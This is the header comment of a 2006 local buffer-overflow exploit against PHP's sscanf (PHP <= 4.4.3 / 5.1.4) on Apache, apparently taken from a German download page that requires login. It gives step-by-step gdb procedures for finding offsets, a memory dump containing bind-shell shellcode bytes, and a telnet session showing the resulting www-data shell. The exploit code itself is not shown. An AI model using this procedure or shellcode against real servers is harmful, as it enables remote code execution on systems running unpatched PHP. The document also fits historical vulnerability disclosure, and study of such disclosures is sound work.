Hoagie php sscanf

/***********************************************************
 * hoagie_php_sscanf.php
 * PHP <= 4.4.3 / 5.1.4 local buffer overflow exploit
 *
 * howto get offsets:
 * (set $base_addr to 0x41414141)
 * # ulimit -c 20000
 * # /etc/init.d/apache restart
 * (execute script via web browser)
 * # tail /var/log/apache/error.log
 * ...
 * [Wed Aug 16 15:07:10 2006] [notice] child pid 28222 exit signal Segmentation fault (11), possible coredump in /tmp
 * ...
 * $ gdb /usr/sbin/apache /tmp/core
 * ...
 * ...
 * #0  0x40422b2d in php_sscanf_internal () from /usr/lib/apache/1.3/libphp4.so
 * (gdb) x/250 $edx
 * ...
 * 0x83ae16c:      0x41414141      0x41414141      0x41414141      0x41414141
 * 0x83ae17c:      0xdeadbabe      0x41414145      0x4141415d      0x00000001
 *                                 ^^^^^^^^^^
 *                                 start of our buffer (0x83ae180) = $base_addr
 * 0x83ae18c:      0x00000008      0x4141415d      0x0833d248      0x00000400
 * 0x83ae19c:      0x909006eb      0x90909090      0xe3f7db31      0x435366b0
 *                                                 ^^^^^^^^^^
 *                                                 start of shell code (0x83ae1a4)
 * 0x83ae1ac:      0x89534353      0x80cd4be1      0x6652c789      0x43204e68
 * 0x83ae1bc:      0xe1895366      0xd0f6efb0      0x89575150      0xcd66b0e1
 * 0x83ae1cc:      0x4366b080      0x5080cd43      0xe1895750      0xcd66b043
 * 0x83ae1dc:      0x89d98980      0x2c6fb0c3      0x80cd4930      0x51f6e241
 * 0x83ae1ec:      0x732f6e68      0x2f2f6868      0xe3896962      0xe1895351
 * 0x83ae1fc:      0xd0f6f4b0      0x414180cd      0x41414141      0x41414141
 * 0x83ae20c:      0x41414141      0x41414141      0x41414141      0x41414141
 * ...
 * (gdb) quit
 * #
 * (change $base_addr in exploit and now call url again)
 * # gdb /usr/sbin/apache /tmp/core
 * #0  0x40475e73 in _efree ()
 * from /usr/lib/apache/1.3/libphp4.so
 * (gdb) x/4w $ebp
 * 0xbfffb018:     0xbfffb038      0x40484241      0x0812a2f4      0xbfffb038
 *                                 ^^^^^^^^^^
 *                                 return address (return address location = 0xbfffb01c)
 * (change $rec_log in exploit and call url again)
 * $ telnet 127.0.0.1 20000
 * Trying 127.0.0.1...
 * Connected to localhost.
 * Escape character is '^]'.
 * id;
 * uid=33(www-data) gid=33(www-data) groups=33(www-data)
 * exit;
 * Connection closed by foreign host.
 * $
 *
 * NOTE: Because of PHP memory allocation this exploit depends on filename, pathname
 *       content etc... (because each line/byte will change emalloc() behavior
 *
 * Credits: Heintz (discovered this bug)
 *          BigHawk (bind shell code)
 *          Greuff (void.at)
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
 * DAMAGE DONE USING THIS PROGRAM.
 *
 * VOID.AT Security
 * andi@void.at
 * http://www.void.at
 *
 ************************************************************/

Sie besitzen nicht die Berechtigung, diese Datei herunterzuladen...

Um die datei zu Downloaden Loggen Sie sich im System ein, oder Regestrieren sie sich neu.


Möchten Sie sich neu registrieren? System Login


Sie k?nnen keine Kommentare abgeben!